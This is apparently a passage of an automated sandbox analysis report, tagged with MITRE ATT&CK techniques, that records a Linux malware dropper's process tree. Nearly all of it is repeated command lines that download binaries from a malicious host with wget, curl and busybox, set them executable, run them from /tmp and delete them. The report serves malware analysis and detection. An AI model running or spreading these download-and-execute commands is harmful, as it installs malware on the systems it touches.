-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:986
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:987
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:988
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Writes file to tmp directory
PID:989
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:993
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:994
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
PID:995
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:998
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:1004
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:1005
-
Network
MITRE ATT&CK Enterprise v15
Downloads